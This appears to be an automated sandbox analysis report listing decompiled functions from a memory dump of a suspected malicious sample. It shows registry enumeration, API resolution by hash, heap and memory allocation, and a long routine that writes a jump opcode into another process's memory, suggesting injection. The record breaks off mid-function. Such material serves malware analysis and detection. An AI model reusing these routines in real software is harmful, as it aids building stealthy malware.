Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction ID: 277c443eb03b5900ecbd5486d84d61a0b2d60c5b533e0e38adff279e41139e98
Opcode Fuzzy Hash: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction Fuzzy Hash: 1DF04F74B042466BFB05A9289D19F7F26AD9BC2610F90C82CF641DE288EA78C945E325

Uniqueness

Uniqueness Score: -1.00%

Function 705755B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E705755B8(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E70572F8C(0xd0443458, 0x286b2253) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E7056E6E8(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x705755c2
0x705755c4
0x705755cb
0x705755cd
0x705755d1
0x705755d3
0x705755d6
0x705755d9
0x705755d9
0x705755f3
0x00000000
0x00000000
0x70575604
0x70575608
0x00000000
0x00000000
0x70575616
0x70575619
0x7057561e
0x70575623
0x70575623

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,D0443458,286B2253,?,?,D0443458,286B2253), ref: 70575604

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction ID: 1c12fd1fbb9b2a2e96633e24bb5017c8dea20726b4fa3b2b692f8a2fd713fdd7
Opcode Fuzzy Hash: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction Fuzzy Hash: A2F0C2B52053096FE7259E1ADC44CBBBBFDEBC0B14F00C81EB0D643200DA71AC509AA0

Uniqueness

Uniqueness Score: -1.00%

Function 70573564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E70573564(void* __ecx) {
				void* _t3;
				intOrPtr* _t8;
				void* _t12;

				_t12 = __ecx;
				if( *0x7057d228 == 0xcd845700) {
					_t8 = E70572F8C(0xa5eabdf8, 0xd926c223);
					 *0x7057d22c = E70572F8C(0xa5eabdf8, 0x9b42cb07);
					if( *0x7057d228 == 0xcd845700) {
						 *_t8(2, 0, 0, 0, 0, 0); // executed
						 *0x7057d228 = 0;
					}
				}
				_t3 = E70572F8C(0xa5eabdf8, 0x80febacc);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t12);
					_push(8);
					_push( *0x7057d228);
					asm("int3");
					return _t3;
				}
			}

0x7057356c
0x70573574
0x705735a7
0x705735b8
0x705735c3
0x705735ce
0x705735d0
0x705735d0
0x705735c3
0x70573580
0x70573587
0x70573597
0x70573589
0x70573589
0x7057358a
0x7057358c
0x7057358e
0x7057358f
0x7057358f

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,A5EABDF8,9B42CB07,A5EABDF8,D926C223,?,?,00000000,7056DEB9,?,?), ref: 705735CE

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 4a32a1e7aad10e91557984c2cda76ddeb97cb40f867ec80288e3a93049590349
Instruction ID: 0df26bdca16290b27eedbe70125083f03f7215aaf5c9311459ff3383be8fda11
Opcode Fuzzy Hash: 4a32a1e7aad10e91557984c2cda76ddeb97cb40f867ec80288e3a93049590349
Instruction Fuzzy Hash: 62F08972208211BDD3111F76AC49D1EBFECEFC4526BA0D829B545AA441EA144880F621

Uniqueness

Uniqueness Score: -1.00%

Function 03151D89, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 03151EA8

Memory Dump Source

Source File: 00000003.00000002.491898377.0000000003150000.00000040.00000001.sdmp, Offset: 03150000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction ID: cf55a62e8a015d34e949f2f559707936106ada7ad22d65c7ad69db7c828be82f
Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction Fuzzy Hash: 2441C2B5E04219DFDB08DFA8C4946AEBBF1FF48714F19852AE858AB340D775A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 70569144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E70569144(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				char _v60;
				intOrPtr _v92;
				void* _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				signed int _v116;
				char _v128;
				intOrPtr _v132;
				void* _v136;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v156;
				char _v160;
				signed int _v164;
				char _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				char _v196;
				void* _v200;
				signed int _v204;
				char _v208;
				char _v212;
				char _v216;
				intOrPtr _v220;
				intOrPtr _v228;
				intOrPtr _v236;
				void* _v268;
				char _v292;
				char _v308;
				char _v316;
				char _v320;
				void* _v324;
				char _v332;
				char _v340;
				void* _v356;
				void* _v360;
				char _v364;
				char _v380;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				intOrPtr _v400;
				signed int _v404;
				char _v408;
				void* _v412;
				char _v416;
				signed int* _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				intOrPtr _v440;
				signed int* _v444;
				char _v448;
				void* _v452;
				intOrPtr _v460;
				char _v464;
				void* _v468;
				char _v472;
				intOrPtr _v476;
				char _v480;
				void* _v484;
				char _v492;
				char _v496;
				void* _v500;
				char _v508;
				char _v516;
				signed int _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _v548;
				char _v552;
				char _v556;
				char _v560;
				signed int _v564;
				signed int _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				signed int _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t437;
				intOrPtr _t442;
				signed int _t444;
				char* _t459;
				char _t534;
				signed int _t544;
				intOrPtr _t546;
				signed int _t550;
				signed int _t556;
				intOrPtr _t561;
				signed int _t567;
				char _t579;
				intOrPtr _t584;
				char _t585;
				intOrPtr _t589;
				char _t590;
				intOrPtr _t594;
				char _t595;
				intOrPtr _t599;
				char _t600;
				intOrPtr _t604;
				char _t605;
				intOrPtr _t609;
				signed int _t622;
				char _t629;
				intOrPtr _t633;
				signed char* _t635;
				signed int _t638;
				intOrPtr _t641;
				signed int* _t647;
				signed int* _t650;
				intOrPtr _t665;
				char* _t806;
				signed int* _t836;
				char* _t837;
				char* _t844;
				void* _t845;
				intOrPtr* _t854;
				signed int* _t856;
				intOrPtr* _t857;
				signed int* _t858;
				signed int* _t860;
				signed int* _t863;
				intOrPtr _t864;
				intOrPtr _t867;
				char _t868;
				signed int _t869;
				intOrPtr* _t872;
				intOrPtr* _t874;
				intOrPtr* _t875;
				intOrPtr* _t876;
				intOrPtr* _t877;
				intOrPtr* _t878;
				signed int* _t881;
				intOrPtr* _t882;
				char* _t907;
				void* _t935;
				char _t950;
				char _t951;
				intOrPtr* _t953;
				void* _t954;
				intOrPtr* _t955;
				void* _t957;

				_t957 = __eflags;
				_t953 =  &_v496;
				_t641 = __edx;
				_v40 = __ecx;
				_t951 =  *((intOrPtr*)(__ecx + 0xc));
				E70572F8C(0x23627913, 0xae88daa3);
				_v496 = 0;
				E7056F620( &_v492, 0);
				_v480 = 0;
				_v476 = 0;
				E7056F620( &_v472, 0);
				_v528 = 0;
				E7056F620( &_v524, 0);
				_v392 = 0x4145240a;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x90], xmm0");
				E7056F8C4( &_v528, E7056F568( &_v528) + 0x10);
				E7056F558( &_v532, E7056F568( &_v532) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v540 = _v540 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v536 + 0x88)) = 0x22dc1034;
				asm("movq [ecx+0x90], xmm0");
				E7056F8C4( &_v536, E7056F568( &_v536) + 0x10);
				E7056F558( &_v540, E7056F568( &_v540) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v548 = _v548 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v544 + 0x88)) = 0xc06fd820;
				asm("movq [ecx+0x90], xmm0");
				E7056F8C4( &_v544, E7056F568( &_v544) + 0x10);
				E7056F558( &_v548, E7056F568( &_v548) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v556 = _v556 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v552 + 0x88)) = 0xa54975b2;
				asm("movq [ecx+0x90], xmm0");
				E7056F8C4( &_v552, E7056F568( &_v552) + 0x10);
				E7056F558( &_v556, E7056F568( &_v556) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v564 = _v564 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v560 + 0x88)) = 0x271e028;
				asm("movq [ecx+0x90], xmm0");
				E7056F8C4( &_v560, E7056F568( &_v560) + 0x10);
				E7056F558( &_v564, E7056F568( &_v564) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v572 = _v572 + 1;
				asm("pxor xmm0, xmm0");
				( &_v568)[0x22] = 0xf279aa39;
				asm("movq [ecx+0x90], xmm0");
				E7056F8C4( &_v568, E7056F568( &_v568) + 0x10);
				E7056F558( &_v572, E7056F568( &_v572) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t953 =  *_t953 + 1;
				E7057413C(0xa5eabdf8, _t953);
				E7056F558( &_v576, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x4c], xmm0");
				E7056F558( &_v580, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x54], xmm0");
				E7056F558( &_v584, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x64], xmm0");
				E7056F558( &_v588, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x6c], xmm0");
				E7056F558( &_v592, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x74], xmm0");
				E7056F558( &_v596, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x7c], xmm0");
				_v584 = _t951;
				E7056ADB8( &_v584,  &_v172, _t957,  &_v192);
				_t889 = _v176;
				_t931 = _v172;
				if((_v176 | _v172) != 0) {
					E7056B338( &_v308, _t951, __eflags, _t889, _t931);
					E7056F8DC( &_v516, __eflags);
					_v520 = 0;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v516 + 0x88)) = 0x5889e652;
					asm("movq [eax+0x8], xmm0");
					E7056F8C4( &_v516, E7056F568( &_v516) + 0x10);
					E7056F558( &_v520, E7056F568( &_v520) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v528 = _v528 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v524 + 0x88)) = 0x1eeb5e35;
					asm("movq [eax+0x8], xmm0");
					E7056F8C4( &_v524, E7056F568( &_v524) + 0x10);
					E7056F558( &_v528, E7056F568( &_v528) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v536 = _v536 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v532 + 0x88)) = 0xac5d5303;
					asm("movq [eax+0x8], xmm0");
					E7056F8C4( &_v532, E7056F568( &_v532) + 0x10);
					E7056F558( &_v536, E7056F568( &_v536) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v544 = _v544 + 1;
					_t954 = _t953 + 0xfffffff4;
					asm("movq xmm0, [esp+0x1bc]");
					asm("movq [esp], xmm0");
					_v548 =  &_v544;
					E7056BAB8( &_v340, __eflags);
					E7056F558( &_v552, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x5c], xmm0");
					E7056F558( &_v556, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x84], xmm0");
					_t935 = E7056F558( &_v560, 0x20);
					_v164 =  *((intOrPtr*)(_t935 + 8));
					_v144 =  *((intOrPtr*)(_t935 + 0xc));
					E7056F620( &_v396, 0);
					E7056F620( &_v416, 0);
					_push(0);
					_push( *0x7057b7c4);
					E705720A4(__eflags,  &_v100);
					E7056F75C( &_v416, __eflags);
					E7056E054( &_v100);
					E7056F8C4( &_v436, E7056F744( &_v420,  &_v100));
					_t437 = E7056F558( &_v424, 0);
					E70567970(_t951, _t437, E7056F558( &_v444, 0), _v112);
					_t442 = E7056F568( &_v448);
					_v228 = _t442;
					_t101 = _t442 + 2; // 0x2
					_v188 = E7056B0A4( &_v584, 0x20000000, __eflags, _t101);
					_v236 = 0x20000000;
					_t444 = E7056B0A4( &_v588, 0x80000000, __eflags, 0x82);
					_v184 = _t444;
					_v204 = 0x80000000;
					__eflags = _t444 | _v204;
					if((_t444 | _v204) == 0) {
						L51:
						E7056F6F0( &_v380);
						E7056F6F0( &_v364);
						E7056F6F0( &_v332);
						goto L1;
					}
					__eflags = _v116 | _v164;
					if((_v116 | _v164) == 0) {
						goto L51;
					}
					E705735D4( &_v292, 0, 0x80);
					_t955 = _t954 + 0xc;
					 *((intOrPtr*)( &_v316 + 0x78)) = _v20;
					E7056CDC0( &_v316, 0);
					_t459 =  &_v320;
					_t854 = _t459 + 0xe8;
					 *_t854 = _t641;
					 *((intOrPtr*)(_t854 - 4)) = _v20;
					_push(_t459);
					E7056B48C(_t641, _t459 - 0x20, _t854 - 4, _v20, _t951, _t951, _t854 - 4);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esp+0x134], xmm1");
					_v236 = E7056F568(_v20);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esi+0x8], xmm1");
					_v220 = E7056F568(_t641);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [ebx-0x90], xmm1");
					E70573C8C(_t951,  &_v60 - 0x80, __eflags, _v148, _v128, 7,  &_v60);
					_t133 =  &(( &_v564)[0x58]); // 0x160
					_t856 = _t133;
					 *_t856 = _v164;
					_t856[1] = ( &_v564)[0x69];
					E7056F8DC( &_v564, __eflags);
					_v568 = 0;
					_t746 =  &_v564;
					asm("pxor xmm0, xmm0");
					_t136 = _t746 + 0x88; // 0x88
					 *_t136 = 0x853cdd04;
					asm("movq [eax+0x8], xmm0");
					E7056F8C4( &_v564, E7056F568( &_v564) + 0x10);
					E7056F558( &_v568, E7056F568( &_v568) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v576 = _v576 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v572 + 0x88)) = 0xb162dc4e;
					asm("movq [eax+0x8], xmm0");
					E7056F8C4( &_v572, E7056F568( &_v572) + 0x10);
					E7056F558( &_v576, E7056F568( &_v576) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v584 = _v584 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v580 + 0x88)) = 0xc15ccc53;
					asm("movq [eax+0x8], xmm0");
					E7056F8C4( &_v580, E7056F568( &_v580) + 0x10);
					E7056F558( &_v584, E7056F568( &_v584) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v592 = _v592 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v588 + 0x88)) = 0x73f8f999;
					asm("movq [eax+0x8], xmm0");
					E7056F8C4( &_v588, E7056F568( &_v588) + 0x10);
					E7056F558( &_v592, E7056F568( &_v592) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v600 = _v600 + 1;
					_t762 =  &_v596;
					asm("pxor xmm0, xmm0");
					_t160 = _t762 + 0x88; // 0xa8
					 *_t160 = 0x4145240a;
					asm("movq [eax+0x8], xmm0");
					E7056F8C4( &_v596, E7056F568( &_v596) + 0x10);
					E7056F558( &_v600, E7056F568( &_v600) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v608 = _v608 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v604 + 0x88)) = 0xf06b4c6b;
					asm("movq [eax+0x8], xmm0");
					E7056F8C4( &_v604, E7056F568( &_v604) + 0x10);
					E7056F558( &_v608, E7056F568( &_v608) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v616 = _v616 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v612 + 0x88)) = 0x7d07f92f;
					asm("movq [eax+0x8], xmm0");
					E7056F8C4( &_v612, E7056F568( &_v612) + 0x10);
					E7056F558( &_v616, E7056F568( &_v616) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v624 = _v624 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v620 + 0x88)) = 0x2c2324e8;
					asm("movq [eax+0x8], xmm0");
					E7056F8C4( &_v620, E7056F568( &_v620) + 0x10);
					E7056F558( &_v624, E7056F568( &_v624) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t857 = _t955;
					 *_t857 =  *_t857 + 1;
					E7057413C(0xa5eabdf8, _t857);
					E7056F558( &_v628, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xf4], xmm0");
					E7056F558( &_v632, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xfc], xmm0");
					E7056F558( &_v636, 0x20);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x104], xmm0");
					E7056F558( &_v640, 0x30);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x10c], xmm0");
					E7056F558( &_v644, 0x40);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x114], xmm0");
					E7056F558( &_v648, 0x50);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x11c], xmm0");
					E7056F558( &_v652, 0x60);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x124], xmm0");
					E7056F558( &_v656, 0x70);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [ecx+0x118], xmm0");
					_t534 = E7056A5A4( &_v644, __eflags);
					_v524 = _t857;
					_t950 = _t534;
					__eflags = _t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff;
					if((_t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff) == 0) {
						L50:
						E7056B608(_t955 + 0xbc);
						E7056CDE0( &_v320, __eflags);
						goto L51;
					}
					_t858 =  &_v128;
					__eflags =  *_t858 | _t858[1];
					if(( *_t858 | _t858[1]) != 0) {
						L18:
						_v396 = 0;
						while(1) {
							__eflags = E7056AD68(0x80, _t950, _v400, _v112, _v132);
							if(__eflags != 0) {
								break;
							}
							_t605 = E7056A5A4( &_v520, __eflags);
							_v400 = 0x80;
							_t950 = _t605;
							__eflags = _t950 - 0xffffffffffffffff | 0x81;
							if((_t950 - 0xffffffffffffffff | 0x81) == 0) {
								goto L50;
							}
							_t878 =  &_v396;
							_t609 =  *_t878 + 1;
							 *_t878 = _t609;
							__eflags = _t609 - 0xa;
							if(_t609 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v396 = 0;
						while(1) {
							_push(0x80);
							_push(_v132);
							_push(_v112);
							_push(_v400);
							_push(_t950);
							_t860 =  &(( &_v520)[0x38]);
							__eflags = E7056A298( &_v520, _t860);
							if(__eflags != 0) {
								break;
							}
							_t600 = E7056A5A4( &_v540, __eflags);
							_v420 = _t860;
							_t950 = _t600;
							__eflags = _t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t877 =  &_v416;
							_t604 =  *_t877 + 1;
							 *_t877 = _t604;
							__eflags = _t604 - 0xa;
							if(_t604 != 0xa) {
								continue;
							}
							goto L50;
						}
						asm("cdq");
						asm("movd xmm1, eax");
						_v416 =  *((intOrPtr*)(_t955 + 0x1a4));
						_t647 =  &_v408;
						asm("movd xmm0, edx");
						asm("punpckldq xmm1, xmm0");
						 *_t647 = 0;
						 *((intOrPtr*)(_t647 - 4)) = _v188;
						asm("movq [edx], xmm1");
						_t544 = E70573BA0(_t951, _t647 - 8, __eflags,  &(_t647[0x48]), 0x40, _t647);
						__eflags = _t544;
						if(_t544 != 0) {
							goto L50;
						}
						_v180 = 0;
						while(1) {
							_t863 = _v184;
							__eflags = E7056AD68(_t863, _t950, _v420,  *((intOrPtr*)(_t955 + 0x1a8)), _v188);
							if(__eflags != 0) {
								break;
							}
							_t595 = E7056A5A4( &_v540, __eflags);
							_v420 = _t863;
							_t950 = _t595;
							__eflags = _t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t876 =  &_v180;
							_t599 =  *_t876 + 1;
							 *_t876 = _t599;
							__eflags = _t599 - 0xa;
							if(_t599 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v184 = 0;
						while(1) {
							_t546 = E7056F558( &_v404, 0);
							_push(E7056F568( &_v408));
							_push(_v192);
							_push(_v144);
							_push(_v424);
							_push(_t950);
							_t864 = _t546;
							__eflags = E7056A298( &_v544, _t864);
							if(__eflags != 0) {
								break;
							}
							_t590 = E7056A5A4( &_v560, __eflags);
							_v440 = _t864;
							_t950 = _t590;
							__eflags = _t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t875 =  &_v204;
							_t594 =  *_t875 + 1;
							 *_t875 = _t594;
							__eflags = _t594 - 0xa;
							if(_t594 != 0xa) {
								continue;
							}
							goto L50;
						}
						_t550 = E70573BA0(_t951,  &_v428 - 8, __eflags,  &_v428 + 0x120, _v428,  &_v428);
						__eflags = _t550;
						if(_t550 != 0) {
							goto L50;
						}
						E7056F620( &_v208, 0);
						_v100 = 0xe9;
						E7056F578( &_v100 - 0x70, __eflags,  &_v100, 1);
						_t650 =  &_v104;
						_t556 = _v172 -  *((intOrPtr*)(_t650 - 0x54)) + 0xfffffffb;
						__eflags = _t556;
						 *_t650 = _t556;
						E7056F578(_t650 - 0x74, __eflags, _t650, 4);
						_t907 =  &_v448;
						asm("movq xmm0, [0x7057b798]");
						 *((intOrPtr*)(_t907 - 8)) = _v196;
						 *((intOrPtr*)(_t907 - 4)) =  *((intOrPtr*)(_t907 + 0x110));
						asm("movq [ebx], xmm0");
						E70573BA0(_t951, _t907 + 0x120 - 0x128, __eflags, _t907 + 0x120, 0x40, _t907);
						_v192 = 0;
						while(1) {
							_t561 = E7056F558( &_v208, 0);
							_push(E7056F568( &_v212));
							_push(_v160);
							_push(_v180);
							_push(_v444);
							_push(_t950);
							_t867 = _t561;
							__eflags = E7056A298( &_v564, _t867);
							if(__eflags != 0) {
								break;
							}
							_t585 = E7056A5A4( &_v580, __eflags);
							_v460 = _t867;
							_t950 = _t585;
							__eflags = _t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff) == 0) {
								L49:
								E7056F6F0(_t955 + 0x174);
								goto L50;
							}
							_t874 =  &_v180;
							_t589 =  *_t874 + 1;
							 *_t874 = _t589;
							__eflags = _t589 - 0xa;
							if(_t589 != 0xa) {
								continue;
							}
							goto L49;
						}
						_v180 = 0;
						while(1) {
							_t955 = _t955 + 0xffffffd8;
							asm("pxor xmm0, xmm0");
							_v640 = _t950;
							_v636 = _v460;
							_t868 = _v196;
							_v632 = _t868;
							_v628 = _v176;
							_t806 =  &_v580;
							_v624 =  *((intOrPtr*)(_t806 + 0x198));
							_v620 =  *((intOrPtr*)(_t806 + 0x184));
							asm("movq [esp+0x18], xmm0");
							asm("movq [esp+0x20], xmm0");
							__eflags = E7056AD04(__eflags);
							if(__eflags != 0) {
								break;
							}
							_t579 = E7056A5A4( &_v616, __eflags);
							_v496 = _t868;
							_t950 = _t579;
							__eflags = _t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff) == 0) {
								goto L49;
							}
							_t872 =  &_v216;
							_t584 =  *_t872 + 1;
							 *_t872 = _t584;
							__eflags = _t584 - 0xa;
							if(__eflags != 0) {
								continue;
							}
							goto L49;
						}
						_push(0);
						_t869 = _v164;
						__eflags = _t869;
						_t870 =  !=  ? _t869 + 0xc : _t869;
						_push( !=  ? _t869 + 0xc : _t869);
						_t567 = E7056C3A8(_t869,  &_v416, 0x2710);
						E7056F6F0(_t955 + 0x184);
						E7056B608( &_v448);
						E7056CDE0( &_v416, __eflags);
						E7056F6F0( &_v480);
						E7056F6F0( &_v464);
						E7056F6F0( &_v432);
						E7056F6F0( &_v632);
						E7056B680( &_v592);
						E7056F6F0( &_v608);
						__eflags = _t567;
						return 0 | _t567 == 0x00000000;
					}
					_v388 = 0;
					do {
						E7056F620(_t955 + 0x188, 0);
						_push(0x23627913);
						_push(_t955 + 0x1cc);
						E70571D00();
						E7056DD7C(_t955 + 0x1d0 - 8, _t955 + 0x1d0);
						_t879 = 0x7fffffff;
						E7056F578( &_v168, __eflags, _v92, E7056E94C(_v92, 0x7fffffff));
						E7056E054( &_v100);
						E7056D098( &_v108);
						_t836 =  &_v176;
						_t665 =  *((intOrPtr*)(_t836 + 0x28));
						 *((intOrPtr*)(_t836 - 0xf0)) = _v156;
						__eflags = E7056F568(_t836);
						if(__eflags <= 0) {
							L12:
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0xac]");
							asm("pxor xmm1, xmm1");
							_t837 =  &_v528;
							_v588 = _t950;
							_v584 =  *((intOrPtr*)(_t837 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v572 =  *((intOrPtr*)(_t837 + 0x198));
							_v568 =  *((intOrPtr*)(_t837 + 0x184));
							asm("movq [esp+0x18], xmm1");
							asm("movq [esp+0x20], xmm1");
							_t622 = E7056AD04(__eflags);
							__eflags = _t622;
							if(_t622 != 0) {
								E7057218C(0x3e8, _t879, _t950);
								E7056F6F0( &_v196);
								E7056ADB8( &_v564,  &(( &_v172)[5]), __eflags,  &_v172);
								_t881 =  &_v176;
								__eflags =  *_t881 | _t881[1];
								if(__eflags != 0) {
									goto L18;
								}
								_t629 = E7056A5A4( &_v564, __eflags);
								_v444 = _t881;
								_t950 = _t629;
								__eflags = _t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff;
								if((_t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff) == 0) {
									goto L50;
								}
								goto L16;
